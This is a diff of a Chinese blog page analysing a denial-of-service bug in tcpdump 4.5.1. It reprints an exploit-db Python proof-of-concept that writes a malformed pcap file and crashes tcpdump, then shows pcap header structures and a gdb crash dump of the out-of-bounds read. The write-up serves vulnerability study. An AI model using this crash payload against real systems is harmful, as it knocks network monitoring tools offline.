class="nav-number">1.5.</span> <span class="nav-text">工作总结：</span></a></li></ol></li></ol></div>
          </div>
--- a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
+++ b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
@ -79,18 +79,18 @@
-<meta name="description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数">
+<meta name="description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的">
 <meta name="keywords" content="TCPDUMP,拒绝服务攻击">
 <meta property="og:type" content="article">
 <meta property="og:title" content="TCPDUMP拒绝服务攻击漏洞">
 <meta property="og:url" content="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html">
 <meta property="og:site_name" content="混元霹雳手">
-<meta property="og:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数">
+<meta property="og:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的">
 <meta property="og:locale" content="zh-Hans">
-<meta property="og:updated_time" content="2019-03-23T04:41:58.890Z">
+<meta property="og:updated_time" content="2019-03-23T04:44:22.487Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="TCPDUMP拒绝服务攻击漏洞">
-<meta name="twitter:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数">
+<meta name="twitter:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的">
@ -432,23 +432,23 @@
-        <h1 id="TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><a href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" class="headerlink" title="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析"></a>TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</h1><h2 id="一、Tcpdump介绍"><a href="#一、Tcpdump介绍" class="headerlink" title="一、Tcpdump介绍"></a>一、Tcpdump介绍</h2><ol>
+        <h1 id="TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><a href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" class="headerlink" title="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析"></a>TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</h1><h2 id="Tcpdump介绍"><a href="#Tcpdump介绍" class="headerlink" title="Tcpdump介绍"></a>Tcpdump介绍</h2><ol>
 <li>tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump；它需要WinPcap驱动，相当于在Linux平台下的libpcap.</li>
 <li>tcpdump能够分析网络行为，性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息，从而使用户能够进一步找出问题的根源。</li>
 <li>也可以使用 tcpdump 的实现特定目的，例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量，如Telnet或HTTP的数据包，查看登录的用户名、密码、网址、正在浏览的网站内容，或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁，而是对网络上的其他计算机的安全存在威胁。</li>
 </ol>
-<h2 id="二、分析环境"><a href="#二、分析环境" class="headerlink" title="二、分析环境"></a>二、分析环境</h2><ul>
+<h2 id="分析环境"><a href="#分析环境" class="headerlink" title="分析环境"></a>分析环境</h2><ul>
 <li>Ubuntu 16.04.4 LTS i686</li>
 <li>tcpdump 4.5.1</li>
 <li>gdb with peda</li>
 </ul>
-<h2 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>三、漏洞复现</h2><p>这个漏洞触发的原因是，tcpdump在处理特殊的pcap包的时候，由于对数据包传输数据长度没有进行严格的控制，导致在连续读取数据包中内容超过一定长度后，会读取到无效的内存空间，从而导致拒绝服务的发生。对于这个漏洞，首先要对pcap包的结构进行一定的分析，才能够最后分析出漏洞的成因，下面对这个漏洞进行复现。</p>
+<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>这个漏洞触发的原因是，tcpdump在处理特殊的pcap包的时候，由于对数据包传输数据长度没有进行严格的控制，导致在连续读取数据包中内容超过一定长度后，会读取到无效的内存空间，从而导致拒绝服务的发生。对于这个漏洞，首先要对pcap包的结构进行一定的分析，才能够最后分析出漏洞的成因，下面对这个漏洞进行复现。</p>
-<h3 id="1-编译安装tcpdump"><a href="#1-编译安装tcpdump" class="headerlink" title="1.编译安装tcpdump"></a>1.编译安装tcpdump</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1.	# apt-get install libpcap-dev</span><br><span class="line">2.	# dpkg -l libpcap-dev</span><br><span class="line">3.	# wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">4.	# tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">5.	# cd tcpdump-4.5.1/</span><br><span class="line">6.	# ./configure</span><br><span class="line">7.	# make</span><br><span class="line">8.	# make install</span><br><span class="line">9.	# tcpdump –-version</span><br><span class="line">          tcpdump version 4.5.1</span><br><span class="line">          libpcap version 1.7.4</span><br></pre></td></tr></table></figure>
+<h3 id="编译安装tcpdump"><a href="#编译安装tcpdump" class="headerlink" title="编译安装tcpdump"></a>编译安装tcpdump</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1.	# apt-get install libpcap-dev</span><br><span class="line">2.	# dpkg -l libpcap-dev</span><br><span class="line">3.	# wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">4.	# tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">5.	# cd tcpdump-4.5.1/</span><br><span class="line">6.	# ./configure</span><br><span class="line">7.	# make</span><br><span class="line">8.	# make install</span><br><span class="line">9.	# tcpdump –-version</span><br><span class="line">          tcpdump version 4.5.1</span><br><span class="line">          libpcap version 1.7.4</span><br></pre></td></tr></table></figure>
-<h3 id="2-生成payload（来自exploit-db-payload）"><a href="#2-生成payload（来自exploit-db-payload）" class="headerlink" title="2.生成payload（来自exploit-db payload）"></a>2.生成payload（来自exploit-db payload）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"># Exploit Title: tcpdump 4.5.1 Access Violation Crash</span><br><span class="line"># Date: 31st May 2016</span><br><span class="line"># Exploit Author: David Silveiro</span><br><span class="line"># Vendor Homepage: http://www.tcpdump.org</span><br><span class="line"># Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz</span><br><span class="line"># Version: 4.5.1</span><br><span class="line"># Tested on: Ubuntu 14 LTS</span><br><span class="line">from subprocess import call</span><br><span class="line">from shlex import split</span><br><span class="line">from time import sleep</span><br><span class="line"></span><br><span class="line">def crash():</span><br><span class="line">    command = &apos;tcpdump -r crash&apos;</span><br><span class="line">    buffer     =   &apos;\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00&lt;\x9c7@\xff\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a&apos;</span><br><span class="line">    buffer     +=  &quot;\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&amp;\x80\x18\&apos;&quot;</span><br><span class="line">    buffer     +=  &quot;xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n&apos;, &apos;\x00\x00\x00\x00&quot;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x01\x03\x03\x04&apos;</span><br><span class="line">    with open(&apos;crash&apos;, &apos;w+b&apos;) as file:</span><br><span class="line">        file.write(buffer)</span><br><span class="line">    try:</span><br><span class="line">        call(split(command))</span><br><span class="line">        print(&quot;Exploit successful!             &quot;)</span><br><span class="line">    except:</span><br><span class="line">        print(&quot;Error: Something has gone wrong!&quot;)</span><br><span class="line">def main():</span><br><span class="line">    print(&quot;Author:   David Silveiro                           &quot;)</span><br><span class="line">    print(&quot;   tcpdump version 4.5.1 Access Violation Crash    &quot;)</span><br><span class="line">    sleep(2)</span><br><span class="line">    crash()</span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
+<h3 id="生成payload（来自exploit-db-payload）"><a href="#生成payload（来自exploit-db-payload）" class="headerlink" title="生成payload（来自exploit-db payload）"></a>生成payload（来自exploit-db payload）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"># Exploit Title: tcpdump 4.5.1 Access Violation Crash</span><br><span class="line"># Date: 31st May 2016</span><br><span class="line"># Exploit Author: David Silveiro</span><br><span class="line"># Vendor Homepage: http://www.tcpdump.org</span><br><span class="line"># Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz</span><br><span class="line"># Version: 4.5.1</span><br><span class="line"># Tested on: Ubuntu 14 LTS</span><br><span class="line">from subprocess import call</span><br><span class="line">from shlex import split</span><br><span class="line">from time import sleep</span><br><span class="line"></span><br><span class="line">def crash():</span><br><span class="line">    command = &apos;tcpdump -r crash&apos;</span><br><span class="line">    buffer     =   &apos;\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00&lt;\x9c7@\xff\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a&apos;</span><br><span class="line">    buffer     +=  &quot;\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&amp;\x80\x18\&apos;&quot;</span><br><span class="line">    buffer     +=  &quot;xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n&apos;, &apos;\x00\x00\x00\x00&quot;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x01\x03\x03\x04&apos;</span><br><span class="line">    with open(&apos;crash&apos;, &apos;w+b&apos;) as file:</span><br><span class="line">        file.write(buffer)</span><br><span class="line">    try:</span><br><span class="line">        call(split(command))</span><br><span class="line">        print(&quot;Exploit successful!             &quot;)</span><br><span class="line">    except:</span><br><span class="line">        print(&quot;Error: Something has gone wrong!&quot;)</span><br><span class="line">def main():</span><br><span class="line">    print(&quot;Author:   David Silveiro                           &quot;)</span><br><span class="line">    print(&quot;   tcpdump version 4.5.1 Access Violation Crash    &quot;)</span><br><span class="line">    sleep(2)</span><br><span class="line">    crash()</span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
-<h2 id="四、崩溃分析"><a href="#四、崩溃分析" class="headerlink" title="四、崩溃分析"></a>四、崩溃分析</h2><h3 id="1-pcap包格式"><a href="#1-pcap包格式" class="headerlink" title="1.pcap包格式"></a>1.pcap包格式</h3><p>首先来分析一下pcap包的格式，首先是pcap文件头的内容，在.h有所定义，这里将结构体以及对应变量含义都列出来。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">struct pcap_file_header &#123;</span><br><span class="line">        bpf_u_int32 magic;</span><br><span class="line">        u_short version_major;</span><br><span class="line">        u_short version_minor;</span><br><span class="line">        bpf_int32 thiszone;     /* gmt to local correction */</span><br><span class="line">        bpf_u_int32 sigfigs;    /* accuracy of timestamps */</span><br><span class="line">        bpf_u_int32 snaplen;    /* max length saved portion of each pkt */</span><br><span class="line">        bpf_u_int32 linktype;   /* data link type (LINKTYPE_*) */</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
+<h2 id="崩溃分析"><a href="#崩溃分析" class="headerlink" title="崩溃分析"></a>崩溃分析</h2><h3 id="pcap包格式"><a href="#pcap包格式" class="headerlink" title="pcap包格式"></a>pcap包格式</h3><p>首先来分析一下pcap包的格式，首先是pcap文件头的内容，在.h有所定义，这里将结构体以及对应变量含义都列出来。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">struct pcap_file_header &#123;</span><br><span class="line">        bpf_u_int32 magic;</span><br><span class="line">        u_short version_major;</span><br><span class="line">        u_short version_minor;</span><br><span class="line">        bpf_int32 thiszone;     /* gmt to local correction */</span><br><span class="line">        bpf_u_int32 sigfigs;    /* accuracy of timestamps */</span><br><span class="line">        bpf_u_int32 snaplen;    /* max length saved portion of each pkt */</span><br><span class="line">        bpf_u_int32 linktype;   /* data link type (LINKTYPE_*) */</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
 <p>看一下各字段的含义：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"> magic：   4字节 pcap文件标识 目前为“d4 c3 b2 a1”</span><br><span class="line"> major：   2字节 主版本号     #define PCAP_VERSION_MAJOR 2</span><br><span class="line"> minor：   2字节 次版本号     #define PCAP_VERSION_MINOR 4</span><br><span class="line"> thiszone：4字节 时区修正     并未使用，目前全为0</span><br><span class="line"> sigfigs： 4字节 精确时间戳   并未使用，目前全为0</span><br><span class="line"> snaplen： 4字节 抓包最大长度 如果要抓全，设为0x0000ffff（65535），</span><br><span class="line">          tcpdump -s 0就是设置这个参数，缺省为68字节</span><br><span class="line"> linktype：4字节 链路类型    一般都是1：ethernet</span><br><span class="line"></span><br><span class="line">struct pcap_pkthdr &#123;</span><br><span class="line">        struct timeval ts;      /* time stamp */</span><br><span class="line">        bpf_u_int32 caplen;     /* length of portion present */</span><br><span class="line">        bpf_u_int32 len;        /* length this packet (off wire) */</span><br><span class="line">&#125;;</span><br><span class="line">struct timeval &#123;</span><br><span class="line">        long            tv_sec;         /* seconds (XXX should be time_t) */</span><br><span class="line">        suseconds_t     tv_usec;        /* and microseconds */</span><br><span class="line">&#125;;</span><br><span class="line"> ts：    8字节 抓包时间 4字节表示秒数，4字节表示微秒数</span><br><span class="line"> caplen：4字节 保存下来的包长度（最多是snaplen，比如68字节）</span><br><span class="line"> len：   4字节 数据包的真实长度，如果文件中保存的不是完整数据包，可能比caplen大</span><br></pre></td></tr></table></figure></p>
 <p>其中len变量是值得关注的，因为在crash文件中，对应len变量的值为00 3C 9C 37<br>这是一个很大的值，读取出来就是379C3C00，数非常大，实际上在wireshark中打开这个crash文件，就会报错，会提示这个数据包的长度已经超过了范围，而换算出来的长度就是379C3C00，这是触发漏洞的关键。</p>
-<h3 id="2-gdb调试"><a href="#2-gdb调试" class="headerlink" title="2.gdb调试"></a>2.gdb调试</h3><p>首先通过gdb运行tcpdump，用-r参数打开poc生成的crash，tcp崩溃，到达漏洞触发位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">1.	Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">2.	[----------------------------------registers-----------------------------------]</span><br><span class="line">3.	EAX: 0x1</span><br><span class="line">4.	EBX: 0x81e33bd --&gt; 0x0</span><br><span class="line">5.	ECX: 0x2e (&apos;.&apos;)</span><br><span class="line">6.	EDX: 0x0</span><br><span class="line">7.	ESI: 0xbfffe201 (&apos;.&apos; &lt;repeats 14 times&gt;)</span><br><span class="line">8.	EDI: 0xbfffe1db --&gt; 0x30303000 (&apos;&apos;)</span><br><span class="line">9.	EBP: 0x10621</span><br><span class="line">10.	ESP: 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;:   mov    ecx,DWORD PTR [esp+0xc])</span><br><span class="line">11.	EIP: 0x8053c6a (&lt;hex_and_ascii_print_with_offset+106&gt;:  movzx  edx,BYTE PTR [ebx+ebp*2+0x1])</span><br><span class="line">12.	EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)</span><br><span class="line">13.	[-------------------------------------code-------------------------------------]</span><br><span class="line">14.	   0x8053c5d &lt;hex_and_ascii_print_with_offset+93&gt;:      je     0x8053d40 &lt;hex_and_ascii_print_with_offset+320&gt;</span><br><span class="line">15.	   0x8053c63 &lt;hex_and_ascii_print_with_offset+99&gt;:      mov    ebx,DWORD PTR [esp+0x18]</span><br><span class="line">16.	   0x8053c67 &lt;hex_and_ascii_print_with_offset+103&gt;:     sub    esp,0x4</span><br><span class="line">17.	=&gt; 0x8053c6a &lt;hex_and_ascii_print_with_offset+106&gt;:     movzx  edx,BYTE PTR [ebx+ebp*2+0x1]</span><br><span class="line">18.	   0x8053c6f &lt;hex_and_ascii_print_with_offset+111&gt;:     movzx  ecx,BYTE PTR [ebx+ebp*2]</span><br><span class="line">19.	   0x8053c73 &lt;hex_and_ascii_print_with_offset+115&gt;:     push   edx</span><br><span class="line">20.	   0x8053c74 &lt;hex_and_ascii_print_with_offset+116&gt;:     mov    ebx,edx</span><br><span class="line">21.	   0x8053c76 &lt;hex_and_ascii_print_with_offset+118&gt;:     mov    DWORD PTR [esp+0x18],edx</span><br><span class="line">22.	[------------------------------------stack-------------------------------------]</span><br><span class="line">23.	0000| 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;:  mov    ecx,DWORD PTR [esp+0xc])</span><br><span class="line">24.	0004| 0xbfffe1b0 --&gt; 0xb7fff000 --&gt; 0x23f3c</span><br><span class="line">25.	0008| 0xbfffe1b4 --&gt; 0x1</span><br><span class="line">26.	0012| 0xbfffe1b8 --&gt; 0x2f5967 (&apos;gY/&apos;)</span><br><span class="line">27.	0016| 0xbfffe1bc --&gt; 0x0</span><br><span class="line">28.	0020| 0xbfffe1c0 --&gt; 0x0</span><br><span class="line">29.	0024| 0xbfffe1c4 --&gt; 0x7ffffff9</span><br><span class="line">30.	0028| 0xbfffe1c8 --&gt; 0x81e33bd --&gt; 0x0</span><br><span class="line">31.	[------------------------------------------------------------------------------]</span><br><span class="line">32.	Legend: code, data, rodata, value</span><br><span class="line">33.	Stopped reason: SIGSEGV</span><br><span class="line">34.	hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,</span><br><span class="line">35.	    length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">36.	91                      s2 = *cp++;</span><br></pre></td></tr></table></figure></p>
+<h3 id="gdb调试"><a href="#gdb调试" class="headerlink" title="gdb调试"></a>gdb调试</h3><p>首先通过gdb运行tcpdump，用-r参数打开poc生成的crash，tcp崩溃，到达漏洞触发位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">1.	Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">2.	[----------------------------------registers-----------------------------------]</span><br><span class="line">3.	EAX: 0x1</span><br><span class="line">4.	EBX: 0x81e33bd --&gt; 0x0</span><br><span class="line">5.	ECX: 0x2e (&apos;.&apos;)</span><br><span class="line">6.	EDX: 0x0</span><br><span class="line">7.	ESI: 0xbfffe201 (&apos;.&apos; &lt;repeats 14 times&gt;)</span><br><span class="line">8.	EDI: 0xbfffe1db --&gt; 0x30303000 (&apos;&apos;)</span><br><span class="line">9.	EBP: 0x10621</span><br><span class="line">10.	ESP: 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;:   mov    ecx,DWORD PTR [esp+0xc])</span><br><span class="line">11.	EIP: 0x8053c6a (&lt;hex_and_ascii_print_with_offset+106&gt;:  movzx  edx,BYTE PTR [ebx+ebp*2+0x1])</span><br><span class="line">12.	EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)</span><br><span class="line">13.	[-------------------------------------code-------------------------------------]</span><br><span class="line">14.	   0x8053c5d &lt;hex_and_ascii_print_with_offset+93&gt;:      je     0x8053d40 &lt;hex_and_ascii_print_with_offset+320&gt;</span><br><span class="line">15.	   0x8053c63 &lt;hex_and_ascii_print_with_offset+99&gt;:      mov    ebx,DWORD PTR [esp+0x18]</span><br><span class="line">16.	   0x8053c67 &lt;hex_and_ascii_print_with_offset+103&gt;:     sub    esp,0x4</span><br><span class="line">17.	=&gt; 0x8053c6a &lt;hex_and_ascii_print_with_offset+106&gt;:     movzx  edx,BYTE PTR [ebx+ebp*2+0x1]</span><br><span class="line">18.	   0x8053c6f &lt;hex_and_ascii_print_with_offset+111&gt;:     movzx  ecx,BYTE PTR [ebx+ebp*2]</span><br><span class="line">19.	   0x8053c73 &lt;hex_and_ascii_print_with_offset+115&gt;:     push   edx</span><br><span class="line">20.	   0x8053c74 &lt;hex_and_ascii_print_with_offset+116&gt;:     mov    ebx,edx</span><br><span class="line">21.	   0x8053c76 &lt;hex_and_ascii_print_with_offset+118&gt;:     mov    DWORD PTR [esp+0x18],edx</span><br><span class="line">22.	[------------------------------------stack-------------------------------------]</span><br><span class="line">23.	0000| 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;:  mov    ecx,DWORD PTR [esp+0xc])</span><br><span class="line">24.	0004| 0xbfffe1b0 --&gt; 0xb7fff000 --&gt; 0x23f3c</span><br><span class="line">25.	0008| 0xbfffe1b4 --&gt; 0x1</span><br><span class="line">26.	0012| 0xbfffe1b8 --&gt; 0x2f5967 (&apos;gY/&apos;)</span><br><span class="line">27.	0016| 0xbfffe1bc --&gt; 0x0</span><br><span class="line">28.	0020| 0xbfffe1c0 --&gt; 0x0</span><br><span class="line">29.	0024| 0xbfffe1c4 --&gt; 0x7ffffff9</span><br><span class="line">30.	0028| 0xbfffe1c8 --&gt; 0x81e33bd --&gt; 0x0</span><br><span class="line">31.	[------------------------------------------------------------------------------]</span><br><span class="line">32.	Legend: code, data, rodata, value</span><br><span class="line">33.	Stopped reason: SIGSEGV</span><br><span class="line">34.	hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,</span><br><span class="line">35.	    length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">36.	91                      s2 = *cp++;</span><br></pre></td></tr></table></figure></p>
